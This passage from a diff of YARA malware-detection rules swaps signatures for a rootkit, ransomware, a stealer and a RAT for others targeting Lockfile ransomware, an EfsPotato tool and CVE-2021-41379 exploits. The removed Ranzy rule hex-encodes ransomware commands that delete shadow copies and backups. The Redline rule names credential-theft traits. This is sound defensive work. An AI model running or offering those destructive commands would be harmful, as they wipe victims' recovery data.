c0 75 09 48 8d 15 [2] 02 00 eb 49 48 8d 0d [2] 02 00 e8 b9 ef ff ff 48 8d 0d [2] 02 00 e8 ad ef ff ff 4c 8d 85 f0 02 00 00 ba 00 00 00 c0 48 8d 0d [2] 02 00 e8 [2] 00 00 ba d0 07 00 00 49 8b ce ff 15 [2] 01 00 85 c0 74 15 48 8d 15 [2] 02 00 b9 01 00 00 00 e8 [2] 00 00 33 db eb 0b 48 8b d7 48 8b ce e8 4b f3 ff ff 49 8b ce ff 15 } condition: - uint16(0)==0x5a4d and filesize >6KB and (3 of ($seq*) or 6 of ($s*)) + uint16(0)==0x5a4d and filesize >10KB and all of ($s*) } -rule ARKBIRD_SOLG_MAL_Moriya_May_2021_2 : FILE +rule ARKBIRD_SOLG_RAN_Lockfile_Aug_2021_1 : FILE { meta: - description = "Detect Moriya rootkit used in the TunnelSnake operation" + description = "Detect Lockfile ransomware (unpacked version)" author = "Arkbird_SOLG" - id = "25cecff1-94f9-5e8d-8758-9b891e9d7373" - date = "2020-05-26" - modified = "2021-05-27" - reference = "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-26/Moriya/MAL_Moriya_May_2021_2.yara#L1-L22" + id = "4abe2e70-5df9-5c5c-ac11-0c958d5430b7" + date = "2021-08-28" + modified = "2021-08-29" + reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/RAN_Lockfile_Aug_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "11ef00940604c3337b1c8c00903297343cfd4e8f3899b949d58e4203ab68d3fd" - score = 75 + logic_hash = "6fc04316b8b4790494a8c88c8435245a051b2757e5936a5ef95cae2f05907b63" + score = 50 quality = 75 tags = "FILE" - hash1 = "ce21319bd21f76ab0f188a514e8ab1fe6f960c257475e45a23d11125d78df428" - tlp = "White" - adversary = "Chinese APT Group" + hash1 = "3303a19789a73fa70a107f8e35a4ce10bb4f6a69ac041a1947481ed8ae99a11c" + level = "experimental" + adversary = "Lockfile" strings: - $seq1 = { 8b 35 c4 30 40 00 8d 45 dc 68 92 24 40 00 50 ff d6 68 cc 24 40 00 8d 45 e4 50 ff d6 68 58 42 40 00 57 57 6a 22 8d 45 dc 50 57 53 ff 15 5c 30 40 00 8b f0 85 f6 0f 88 0a ff ff ff a1 58 42 40 00 83 48 1c 04 8d 45 dc 50 8d 45 e4 50 ff 15 60 30 40 00 e8 b2 00 00 00 } - $seq2 = { 68 3c 24 40 00 50 ff 15 c4 30 40 00 8d 85 d8 fe ff ff 50 ff 15 bc 30 40 00 85 c0 74 1b 8d 8d e0 fe ff ff 51 ff d0 8b 8d e4 fe ff ff 8b 85 e8 fe ff ff 0f b7 5d f4 eb 28 53 8d 85 cc fe ff ff 50 8d 85 d4 fe ff ff 50 8d 85 d0 fe ff ff 50 ff 15 ac 30 40 00 8b 8d d0 fe ff ff 8b 85 d4 fe ff ff c1 e1 08 0f b6 c0 0b c1 0f b6 cb } - $seq3 = { 8b 75 c0 8d 45 cc 50 ff 15 94 30 40 00 8b 5d c8 8b 43 0c 8b 55 bc 89 42 20 8b 43 08 89 42 1c 80 62 03 0f 8a 43 10 24 0f 08 42 03 8b 4b 08 85 c9 74 30 80 7e 24 00 74 06 f6 43 10 20 75 17 8b 46 18 85 c0 78 0a f6 43 10 40 75 0a 85 c0 79 20 f6 43 10 80 74 1a ff 73 0c 56 ff 75 b4 ff d1 8b f8 eb 0d 80 7e 21 00 74 07 8b 46 60 80 48 03 01 68 74 6e 68 00 53 ff 15 b4 30 40 00 } - $seq4 = { 6a 79 68 78 6f 00 00 68 72 70 00 00 6a 69 68 73 6e 00 00 6a 5c 68 72 65 00 00 6a 76 68 69 72 00 00 68 44 5c 00 00 50 e8 a2 f8 ff ff 83 c4 30 8d 85 7c ff ff ff 50 8d 85 6c ff ff ff 50 ff 15 c4 30 40 00 a1 88 30 40 00 68 34 42 40 00 56 56 ff 30 8d 85 6c ff ff ff 56 56 6a 40 50 ff 15 90 30 40 00 } - $seq5 = { 55 8b ec 81 ec 28 01 00 00 a1 04 40 40 00 33 c5 89 45 fc 8b 45 08 53 8b 5d 10 56 8b 75 0c 57 89 85 e8 fe ff ff 8d 7d 88 8b 45 14 6a 07 89 85 e4 fe ff ff 33 c0 59 f3 ab 33 ff 89 b5 d8 fe ff ff 68 94 00 00 00 8d 85 f0 fe ff ff 89 bd ec fe ff ff 57 50 e8 48 03 00 00 6a 06 89 7d e0 33 c0 59 8d 7d e4 f3 ab 33 ff 8d 45 a8 6a 38 57 50 89 7d a4 e8 2a 03 00 00 89 bd dc fe ff ff 8d 45 84 89 bd e0 fe ff ff 83 c4 18 89 bd dc fe ff ff 89 bd e0 fe ff ff 8d 7d 84 a5 ff b5 e4 fe ff ff 50 a5 53 a5 a5 c7 45 98 68 1b } - $s1 = "\\Device\\MoriyaStreamWatchmen" fullword wide - $s2 = "Moriya Filter" fullword wide - $s3 = "Moriya Callout" fullword wide - $s4 = "\\DosDevices\\MoriyaStreamWatchmen" fullword wide + $s1 = { 80 32 41 48 8d 52 01 ff c1 81 f9 d1 57 00 00 72 ef 4c 8d 05 78 d4 06 00 33 d2 33 c9 ff 15 06 9a 05 00 48 8b d8 ff 15 0d 9a 05 00 48 8b cb 3d b7 00 00 00 75 14 ff 15 0d 9a 05 00 33 c0 48 81 c4 d0 03 00 00 41 5c 5b 5d c3 4c 89 b4 24 c8 03 00 00 4c 89 bc 24 c0 03 00 00 ff 15 e9 99 05 00 ff } + $s2 = "winsta0\\default" fullword ascii + $s3 = { 55 56 57 48 8d 6c 24 f0 48 81 ec 10 01 00 00 33 db 48 8b f1 48 89 5c 24 68 48 89 5d 40 48 89 5c 24 60 ff 15 0b a2 05 00 8b c8 89 45 38 48 8d 54 24 68 ff 15 1b a5 05 00 0f 57 c0 8d 7b 30 33 c0 48 89 45 00 48 89 45 98 48 8d 05 d4 db 06 00 0f 11 45 a0 c7 45 a0 68 00 00 00 0f 11 45 b0 48 89 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 0f 11 45 f0 0f 11 45 88 ff 15 17 a2 05 00 4c 8d 44 24 60 ba eb 01 02 00 48 8b c8 ff 15 4c a1 05 00 85 c0 0f 84 10 01 00 00 4c 8d 44 24 70 33 c9 48 8d 15 8e db 06 00 ff 15 28 a1 05 00 85 c0 0f 84 f4 00 00 00 48 8b 44 24 70 44 8d 4b 01 48 8b 4c 24 60 45 33 c0 48 89 44 24 7c ba 00 00 00 02 48 8d 45 40 c7 44 24 78 01 00 00 00 48 89 44 24 28 c7 44 24 20 01 00 00 00 c7 45 84 02 00 00 00 ff 15 ef a0 05 00 85 } + $s4 = { 48 8d 85 18 03 00 00 40 88 74 24 53 48 89 44 24 30 4c 8d 4c 24 44 48 8b 05 57 04 0c 00 48 8d 15 f0 dd 06 00 48 89 44 24 28 48 8d 8d d0 01 00 00 48 8d 45 b0 4c 8b c3 48 89 44 24 20 e8 13 f3 ff ff 48 89 74 24 30 48 8d 8d d0 01 00 00 c7 44 24 28 80 00 00 00 45 33 c9 45 33 c0 c7 44 24 20 02 00 00 00 ba 00 00 00 c0 ff 15 a6 a3 05 00 44 8b 05 8f fe 07 00 48 8d 4d 88 48 8b f8 e8 23 b5 ff ff 48 83 } + $s5 = { 3c 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3e 25 73 3c 2f 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3e 00 3c 62 6c 6f 63 6b 6e 75 6d 3e 25 64 3c 2f 62 6c 6f 63 6b 6e 75 6d 3e 00 25 73 5c 25 73 2d 25 73 2d 25 64 25 73 } + $s6 = { 33 d2 48 8d 8d c0 00 00 00 41 b8 04 01 00 00 e8 48 99 03 00 48 8d 95 10 03 00 00 c7 85 10 03 00 00 04 01 00 00 48 8d 4d b0 ff 15 c5 a5 05 00 4c 8d 45 b0 48 8d 15 2a df 06 00 48 8d 8d c0 00 00 00 e8 96 f4 ff ff 44 8d 46 02 48 8d 15 33 df 06 00 48 8d 4c 24 68 e8 81 f4 ff ff c6 85 18 03 00 00 2f 8b ce c6 85 19 03 00 00 69 c6 85 1a 03 00 00 75 c6 85 1b 03 00 00 62 40 88 b5 1c 03 00 00 0f b6 } condition: - uint16(0)==0x5a4d and filesize >6KB and (3 of ($seq*) or 2 of ($s*)) + uint16(0)==0x5a4d and filesize >10KB and 5 of ($s*) } -rule ARKBIRD_SOLG_Ran_Ranzy_Locker_Nov_2020_1 : FILE +rule ARKBIRD_SOLG_Tool_Efspotatoe_Aug_2021_1 : FILE { meta: - description = " Detect Ranzy Locker (RAAS)" + description = "Detect custom .NET variant EFSPotatoe tool" author = "Arkbird_SOLG" - id = "7e81d73a-ef18-5f89-b6b3-f56212d30b4a" - date = "2020-11-19" - modified = "2020-11-19" - reference = "https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-19/Ranzy_Locker/Ran_Ranzy_Locker_Nov_2020_1.yar#L1-L36" + id = "614a6543-89ce-5f75-9933-766fd1e5458b" + date = "2021-08-27" + modified = "2021-08-29" + reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/Tool_EFSPotatoe_Aug_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "e27017fa196d14b88c5cb682a070d10e42b63f9e21189d9917c0ae03c47216cc" + logic_hash = "a9fed543aeaba380688ec59034b0e8c90fc0bea986085958966101bd44cf480f" score = 75 quality = 75 tags = "FILE" - hash1 = "393fd0768b24cd76ca653af3eba9bff93c6740a2669b30cf59f8a064c46437a2" - hash2 = "90691a36d1556ba7a77d0216f730d6cd9a9063e71626489094313c0afe85a939" - hash3 = "ade5d0fe2679fb8af652e14c40e099e0c1aaea950c25165cebb1550e33579a79" - hash4 = "bbf122cce1176b041648c4e772b230ec49ed11396270f54ad2c5956113caf7b7" - hash5 = "c4f72b292750e9332b1f1b9761d5aefc07301bc15edf31adeaf2e608000ec1c9" + hash1 = "c372c54b11465688201e2d48ffd5fd5b0ca49360858a70ce8413f5c9e24c8050" + hash2 = "441cb0576151b2e5b5127be72a5bcdf3577a596f0a4e1f2c6836248fe07eb818" + adversary = "Lockfile" strings: - $s1 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii - $s2 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii - $s3 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii - $s4 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii - $s5 = "534F4654574152455C4D6963726F736F66745C45524944" ascii - $s6 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573" - $s7 = "7B5549447D" ascii - $s8 = "7B5041545445524E5F49447D" ascii - $s9 = "726561646D652E747874" ascii - $s10 = "226E6574776F726B223A22" ascii - $s11 = "226C616E67223A22" ascii - $s12 = "7B4558547D" ascii - $s13 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838" - $s14 = "433A5C50726F6772616D2046696C65735C4D6963726F736F66742053514C20536572766572" ascii - $s15 = "433A5C50726F6772616D2046696C65732028783836295C4D6963726F736F66742053514C20536572766572" ascii - $s16 = "227375626964223A22" ascii - $s17 = "22657874223A22" ascii - $s18 = "226B6579223A22" ascii - $seq1 = { 8b 46 50 8d 4d a4 83 7d d4 10 53 8b 1d 14 80 41 00 89 45 a4 8d 45 c0 0f 43 45 c0 51 50 6a 00 6a 01 6a 00 ff 35 e8 1c 42 00 ff d3 85 c0 0f 84 b9 00 00 00 8b 46 68 8d 4d a4 83 7d ec 10 57 89 45 a4 8d 45 d8 0f 43 45 d8 33 ff 51 50 6a 00 47 57 6a 00 ff 35 e8 1c 42 00 ff d3 85 c0 0f 84 8a 00 00 00 c6 45 fc 02 33 db 8b 45 e8 8b 4d d0 03 c1 6a 0f 5a 89 5d b8 89 55 bc 88 5d a8 89 7d a4 3b c2 76 15 88 5d a0 8d 4d a8 ff 75 a0 50 e8 78 02 00 00 8b 4d d0 89 5d b8 83 7d d4 10 8d 45 c0 51 0f 43 45 c0 8d 4d a8 50 e8 ca de ff ff 83 7d ec 10 8d 45 d8 ff 75 e8 0f 43 45 d8 8d 4d a8 50 e8 b3 de ff ff 8d 45 a8 50 8d 4e 70 e8 b8 d8 ff ff 8d 4d a8 e8 3f bf ff ff 8d 4d d8 e8 37 bf ff ff 8d 4d c0 e8 2f bf ff ff b0 01 eb 12 8d 4d d8 e8 23 bf ff ff 8d 4d c0 e8 1b bf ff ff 32 c0 e8 3f f1 } - $seq2 = { 8b 75 08 33 ff 8b 55 0c 33 c0 89 b5 68 fb ff ff 89 bd ac fb ff ff c7 85 b0 fb ff ff 07 00 00 00 66 89 85 9c fb ff ff 89 7d fc 39 7a 10 0f 84 da 00 00 00 6a 02 0f 57 c0 8d 8d 84 fb ff ff 58 66 0f 13 85 bc fb ff ff 66 89 85 b4 fb ff ff e8 6e ac ff ff 83 78 14 10 72 02 8b 00 50 ff 15 18 82 41 00 8d 8d 84 fb ff ff 89 85 b8 fb ff ff e8 8f a8 ff ff 68 87 69 00 00 ff 15 0c 82 41 00 bb 01 04 00 00 66 89 85 b6 fb ff ff 53 8d 85 c4 fb ff ff 57 50 e8 fd 2d 00 00 83 c4 0c 8d 7d cc 33 c0 6a 08 59 6a 08 6a 20 f3 ab 8d 45 cc 50 53 8d 85 c4 fb ff ff 50 6a 10 8d 85 b4 fb ff ff 50 ff 15 1c 82 41 00 85 c0 75 45 8d 85 c4 fb ff ff 50 8d 8d 6c fb ff ff e8 7f a8 ff ff 8b d0 c6 45 fc 01 8d 8d 84 fb ff ff e8 26 ab ff ff 50 8d 8d 9c fb ff ff e8 88 bf ff ff 8d 8d 84 fb ff ff e8 c8 c2 ff ff 8d 8d 6c fb ff ff e8 f5 a7 ff ff 8d 85 9c fb } + $s1 = { 5c 00 70 00 69 00 70 00 65 00 5c 00 6c 00 73 00 61 00 72 00 70 00 63 } + $s2 = "ncacn_np" fullword wide + $s3 = "WinSta0\\Default" fullword wide + $s4 = { 11 00 72 cc 01 00 70 28 06 00 00 0a 00 dd de 02 00 00 00 de 12 07 14 fe 01 13 0f 11 0f 2d 07 07 6f 0f 00 00 0a 00 dc 00 28 10 00 00 0a 13 10 12 10 72 16 02 00 70 28 11 00 00 0a 0d 72 1a 02 00 70 09 72 2e 02 00 70 28 12 00 00 0a 13 04 11 04 19 16 1f 0a 20 00 08 00 00 20 00 08 00 00 16 7e 0d 00 00 0a 28 06 00 00 06 13 05 11 05 15 73 13 00 00 0a 28 14 00 00 0a 16 fe 01 13 0f 11 0f 2d 25 00 72 48 02 00 70 28 0e 00 00 0a 73 15 00 00 0a 6f 16 00 00 0a 28 0a 00 00 0a 28 06 00 00 0a 00 38 4a 02 00 00 16 73 17 00 00 0a 13 06 14 fe 06 04 00 00 06 73 18 00 00 0a 73 19 00 00 0a 13 07 11 07 17 6f 1a 00 00 0a 00 11 07 18 8d 01 00 00 01 13 11 11 11 16 11 05 8c 15 00 00 01 a2 11 11 17 11 06 a2 11 11 6f 1b 00 00 0a 00 14 fe 06 03 00 00 06 73 18 00 00 0a 73 19 00 00 0a 13 08 11 08 17 6f 1a 00 00 0a 00 11 08 09 6f 1b 00 00 0a 00 11 06 20 e8 03 00 00 6f 1c 00 00 0a 16 fe 01 13 0f 11 0f 3a 93 01 00 00 00 11 05 28 08 00 00 06 16 fe 01 13 0f 11 0f 3a 7c 01 00 00 00 28 08 00 00 0a 6f 0b 00 00 0a 13 09 72 7c 02 00 70 11 09 8c 15 00 00 01 28 1d 00 00 0a 28 06 00 00 0a 00 12 0a fe 15 08 00 00 02 12 0a 11 0a 28 02 00 00 2b 7d 1d 00 00 04 12 0a 7e 0d 00 00 0a 7d 1e 00 00 04 12 0a 17 7d 1f 00 00 04 12 0b 12 0c 12 0a 20 00 04 00 00 28 0b 00 00 06 26 12 0d fe 15 06 00 00 02 12 0e fe 15 07 00 00 02 12 0e 11 0e 28 03 00 00 2b 7d 0b 00 00 04 12 0e 11 0c 7d 1c 00 00 04 12 0e 11 0c 7d 1b 00 00 04 12 0e 72 9c 02 00 70 7d 0d 00 00 04 12 0e 20 01 01 00 00 7d 16 00 00 04 12 0e 16 7d 17 00 00 04 } + $s5 = "EfsPotato <cmd>" wide + $s6 = "\\\\.\\pipe\\" wide condition: - uint16(0)==0x5a4d and filesize >80KB and 10 of ($s*) and 1 of ($seq*) + uint16(0)==0x5a4d and filesize >10KB and 5 of ($s*) } -rule ARKBIRD_SOLG_APT_Turla_Comrat_Chinch_V4_Jan_2021_1 : FILE +rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_2 : CVE_2021_41379 FILE { meta: - description = "Detect ComRAT V4 (Chinch) used by APT Turla group" + description = "Detect exploit tool using CVE-2021-41379 (variant 2)" author = "Arkbird_SOLG" - id = "7d4daf3d-eed9-59fb-a4b9-fbc1c72adfcd" - date = "2021-01-23" - modified = "2021-01-26" + id = "29fe9a9c-5180-55c8-882b-ad18981dc011" + date = "2021-11-26" + modified = "2021-11-29" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-23/Turla/APT_Turla_ComRAT_Chinch_V4_Jan_2021_1.yar#L1-L28" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_2.yara#L1-L22" license_url = "N/A" - logic_hash = "0d92207c4716f8d2fbf1d4f0cf3a33c38417fdd1565c87c251f7ff290135c435" + logic_hash = "28b1d0d6c0ee14cd46b12763692f4f76020cd5ad74bb2b39b61f493b98486068" score = 75 quality = 75 - tags = "FILE" - hash1 = "a62e1a866bc248398b6abe48fdb44f482f91d19ccd52d9447cda9bc074617d56" + tags = "CVE-2021-41379, FILE" + hash1 = "13fe508e7efb50378eb8e0225221283756bf482d51be7837f850ef2b7f3281f0" + hash2 = "402722d95d468ddef049e1079c882bb9a316841b9695a15783fc23bbd3b33aed" + hash3 = "d025564e6dc872cff32f2295e0b5a2d8e3a21fbef1957facb69a493fa8a995fb" + hash4 = "dc65cd6311fd764a89d0761932bef61a89fd979510bd9ff23cde8c001de316b8" + tlp = "white" + adversary = "-" strings: - $com1 = "state->_reprocess_current_token || token.type != GUMBO_TOKEN_START_TAG || token.v.start_tag.attributes.data == NULL" fullword wide - $com2 = "fragment_ctx != GUMBO_TAG_LAST" fullword wide - $com3 = "has_matching_a == 1" fullword wide - $com4 = "ODFA: %u %d %u" fullword ascii - $com5 = "Custom browser path is empty." fullword ascii - $com6 = "Default browser path is:" fullword ascii - $com7 = "Search for browser path." fullword ascii - $com8 = "Cant retrieve any path." fullword ascii - $com9 = "Custom browser path is:" fullword ascii - $jmp1 = { 2e 64 6c 6c 00 55 4d 45 50 00 56 46 45 50 } - $jmp2 = { 33 c9 e9 ?? ?? ff ff cc cc cc cc cc cc cc cc cc } - $seq1 = { 40 55 48 8d ac 24 00 fd ff ff 48 81 ec 00 04 00 00 48 8b 05 80 46 1b 00 48 33 c4 48 89 85 d0 02 00 00 b9 d8 02 00 00 e8 f4 8b 07 00 4c 8b 0d c5 a5 1c 00 48 8d 95 00 01 00 00 4c 8b 05 af a5 1c 00 48 8d 0d c8 9d 1c 00 4d 2b c8 48 89 05 ae 8a 1d 00 e8 a9 7e fc ff 48 83 bd 18 01 00 00 10 48 8d 8d 00 01 00 00 48 0f 43 8d 00 01 00 00 ff 15 24 f3 0c 00 48 8b 15 25 f3 0c 00 48 8b c8 e8 6d 59 fb ff 48 8b 95 18 01 00 00 48 83 fa 10 } - $seq2 = { 41 8b 41 08 83 e8 09 83 f8 08 } - $seq3 = { 48 8b 03 48 8b cb ff 50 08 48 8b 95 f8 01 00 00 48 83 fa 08 72 39 48 8b 8d e0 } - $seq4 = { b8 09 00 00 00 44 88 a5 60 01 00 00 48 8d 8d 60 01 00 00 f3 0f 7f 85 70 01 00 00 e8 c1 19 fc ff ba df 5e ca 76 48 8d 4d 50 e8 63 ea fc ff 48 8b c8 48 8d 95 60 01 00 00 e8 c4 cb ff ff 0f b6 15 dd 8b 1c 00 48 8b c8 e8 35 cd ff ff 48 8b 95 78 01 00 00 48 83 fa 10 72 34 } + $s1 = { 4c 89 6c 24 38 44 89 6c 24 30 44 89 6c 24 28 44 89 6c 24 20 [1-2] 01 00 00 00 ?? 8b ?? 45 33 c0 ba 03 00 08 00 48 8d 0d [3] 00 ff 15 [3] 00 48 8b d8 48 83 f8 ff 0f 84 ?? 01 00 00 33 d2 48 8b c8 ff 15 [3] 00 44 89 6d 10 48 8d 55 10 48 8b cb ff 15 [3] 00 48 8b cb ff 15 [3] 00 ff 15 [3] 00 44 8b c0 33 d2 b9 00 10 10 00 ff 15 [3] 00 48 8b d8 4c 89 } + $s2 = { 4c 89 6c 24 30 c7 44 24 28 80 00 00 04 c7 44 24 20 04 00 00 00 45 33 c9 [1-2] 01 00 00 00 ?? 8b ?? ba 00 00 01 80 48 8d 4d 20 ff 15 [3] 00 48 89 05 [3] 00 44 89 6d 14 48 8d 45 14 48 89 44 24 28 44 89 6c 24 20 45 33 c9 4c 8d 05 [2] ff ff 33 d2 33 c9 ff 15 [3] 00 48 8b d8 ?? 8b ?? ba 04 01 00 00 49 8d ?? 10 02 00 00 [4] 00 } + $s3 = { 40 53 48 81 ec 30 08 00 00 48 8b 05 [3] 00 48 33 c4 48 89 84 24 20 08 00 00 0f 10 05 [3] 00 48 8b d9 33 d2 0f 10 0d [3] 00 48 8d 4c 24 50 41 b8 d0 07 00 00 0f 29 44 24 20 0f 10 05 [3] 00 0f 29 4c 24 30 0f 29 44 24 40 e8 [2] 00 00 4c 8b 0b 48 8d 44 24 20 41 b8 00 04 00 00 41 8b c8 66 83 38 00 74 0a 48 83 c0 02 48 83 e9 01 75 f0 45 33 d2 49 8b c0 48 2b c1 48 85 c9 49 0f 44 c2 74 47 4c 2b c0 48 8d 44 44 20 74 2e b9 fe ff ff 7f 4c 2b c8 0f 1f 80 00 00 00 00 48 85 c9 74 1a 41 0f b7 14 01 66 85 d2 74 10 66 89 10 48 ff c9 48 83 c0 02 49 83 e8 01 75 e1 4d 85 c0 48 8d 50 fe 48 0f 45 d0 66 44 89 12 33 d2 8d 4a 02 ff 15 [3] 00 48 8b 4b 08 48 8d 54 24 20 ff 15 [3] 00 33 c0 48 8b 8c 24 20 08 00 00 48 33 cc e8 [2] 00 00 48 81 c4 30 08 00 00 5b } + $s4 = { 48 8b c8 ff 15 [3] 00 33 c9 ff 15 [3] 00 48 8b c8 41 b8 04 01 00 00 48 8d 95 30 02 00 00 ff 15 [3] 00 e8 [2] ff ff 48 8b d0 45 33 c0 48 8d 8d 30 02 00 00 ff 15 [3] 00 33 c9 ff 15 [3] 00 48 8d } condition: - uint16(0)==0x5a4d and filesize >1000KB and 6 of ($com*) and all of ($jmp*) and 3 of ($seq*) + uint16(0)==0x5A4D and filesize >25KB and all of ($s*) } -rule ARKBIRD_SOLG_Mal_Stealer_NET_Redline_Aug_2020_1 : FILE +rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_1 : CVE_2021_41379 FILE { meta: - description = "Detect Redline Stealer (August 2020)" + description = "Detect exploit tool using CVE-2021-41379" author = "Arkbird_SOLG" - id = "6fda87c3-0d00-5c00-a1ff-6d96dd726ddf" - date = "2020-08-24" - modified = "2020-08-24" - reference = "https://twitter.com/JAMESWT_MHT/status/1297878628450152448" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-24/Redline/Mal_Stealer_NET_Redline_Aug_2020_1.yar#L1-L31" + id = "616e697d-0c62-58bb-9f37-29670a09d886" + date = "2021-11-26" + modified = "2021-11-29" + reference = "https://twitter.com/JAMESWT_MHT/status/1463414554004709384" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_1.yara#L1-L21" license_url = "N/A" - logic_hash = "950641dfaf17f332e6a18961aebb2533732d82ce69f3617efa08cc63272f1786" + logic_hash = "5514ab8f95a5d82453407dd506d55eaf1a0aa22f5ce6a5fb18501ef41645305a" score = 75 quality = 75 - tags = "FILE" - hash1 = "4195430d95ac1ede9bc986728fc4211a1e000a9ba05a3e968dd302c36ab0aca0" + tags = "CVE-2021-41379, FILE" + hash1 = "5d97d3035b2ec1bd16016922899350693cae5f7a3be6cadbe0da34fbfd14b612" + hash2 = "76fe99189fa84e28dd346b1105da77c4dfd3f7f16478b05bfca4c13a75d9fd07" + hash3 = "9e4763ddb6ac4377217c382cf6e61221efca0b0254074a3746ee03d3d421dabd" + hash4 = "a018545b334dc2a0e0c437789a339c608852fa1cedcc88be9713806b0855faea" + tlp = "white" + adversary = "-" strings: - $s1 = { 53 00 45 00 4c 00 45 00 43 00 54 00 20 00 2a 00 20 00 46 00 52 00 4f 00 4d 00 20 00 57 00 69 00 6e 00 33 00 32 00 5f 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 20 00 57 00 68 00 65 00 72 00 65 00 20 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 49 00 64 00 3d 00 27 00 7b 00 30 00 7d } - $s2 = { 28 00 28 00 28 00 28 00 5b 00 30 00 2d 00 39 00 2e 00 5d 00 29 00 5c 00 64 00 29 00 2b 00 29 00 7b 00 31 00 7d 00 29 } - $s3 = { 7b 00 30 00 7d 00 5c 00 46 00 69 00 6c 00 65 00 5a 00 69 00 6c 00 6c 00 61 00 5c 00 72 00 65 00 63 00 65 00 6e 00 74 00 73 00 65 00 72 00 76 00 65 00 72 00 73 00 2e 00 78 00 6d 00 6c } - $s4 = { 7b 00 30 00 7d 00 5c 00 46 00 69 00 6c 00 65 00 5a 00 69 00 6c 00 6c 00 61 00 5c 00 73 00 69 00 74 00 65 00 6d 00 61 00 6e 00 61 00 67 00 65 00 72 00 2e 00 78 00 6d 00 6c } - $s5 = { 53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 4d 00 61 00 72 00 74 00 69 00 6e 00 20 00 50 00 72 00 69 00 6b 00 72 00 79 00 6c 00 5c 00 57 00 69 00 6e 00 53 00 43 00 50 00 20 00 32 00 5c 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 73 } - $s6 = "<encrypted_key>k__BackingField" fullword ascii - $s7 = "set_encrypted_key" fullword ascii - $s8 = "UserAgentDetector" fullword ascii - $s9 = "set_encrypted_key" fullword ascii - $s10 = "set_FtpConnections" fullword ascii - $s11 = "set_IsProcessElevated" fullword ascii - $s12 = "SELECT ExecutablePath, ProcessID FROM Win32_Process" fullword wide - $s13 = "<IsProcessElevated>k__BackingField" fullword ascii - $s14 = "System.Collections.Generic.IEnumerable<RedLine.Logic.Json.JsonValue>.GetEnumerator" fullword ascii - $s15 = "System.Collections.Generic.IEnumerator<RedLine.Logic.Json.JsonValue>.get_Current" fullword ascii - $s16 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\browser.exe" fullword wide - $s17 = "ProcessExecutablePath" fullword ascii - $s18 = "IsProcessElevated" fullword ascii - $s19 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\firefox.exe" fullword wide - $s20 = "get_encryptedPassword" fullword ascii + $s1 = { 50 6a 01 50 68 03 00 08 00 68 [3] 00 ff 15 [3] 00 8b f0 83 fe ff 0f 84 [2] 00 00 6a 00 56 ff 15 88 [2] 00 8d 85 ?? fb ff ff c7 85 ?? fb ff ff 00 00 00 00 50 56 ff 15 [3] 00 8b 3d [3] 00 56 ff d7 ff 15 [3] 00 50 6a 00 68 00 10 10 00 ff 15 [3] 00 8b f0 c7 85 ?? fb ff ff 00 00 00 00 8d 85 ?? fb ff ff 50 68 ff 01 0f 00 56 ff 15 [3] 00 56 ff d7 8d 85 ?? fb ff ff c7 85 ?? fb ff ff 00 00 00 00 50 6a 01 6a 02 6a 00 68 ff 01 0f 00 ff b5 ?? fb ff ff ff 15 [3] 00 ff b5 ?? fb ff ff ff d7 6a 04 8d 85 ?? fb ff ff 50 6a 0c ff b5 ?? fb ff ff ff 15 08 [2] 00 6a 44 8d 85 78 fb ff ff 0f 57 c0 6a 00 50 0f 11 85 bc fb ff ff e8 [2] 00 00 83 c4 0c c7 85 78 fb ff ff 44 00 00 00 b8 05 00 00 00 c7 85 80 fb ff ff [3] 00 66 89 85 a8 fb ff ff 8d 85 e8 fd ff ff 68 04 01 00 00 50 68 [3] 00 ff 15 [3] 00 8d 85 bc fb ff ff 50 8d 85 78 fb ff ff 50 6a 00 6a 00 6a 10 6a 00 6a 00 6a 00 6a 00 8d 85 e8 fd ff ff 50 ff b5 ?? fb ff ff ff 15 [3] 00 ff b5 ?? fb ff ff ff d7 ff b5 bc fb ff ff ff d7 ff b5 c0 fb ff ff ff d7 } + $s2 = { 6a 00 68 80 00 00 04 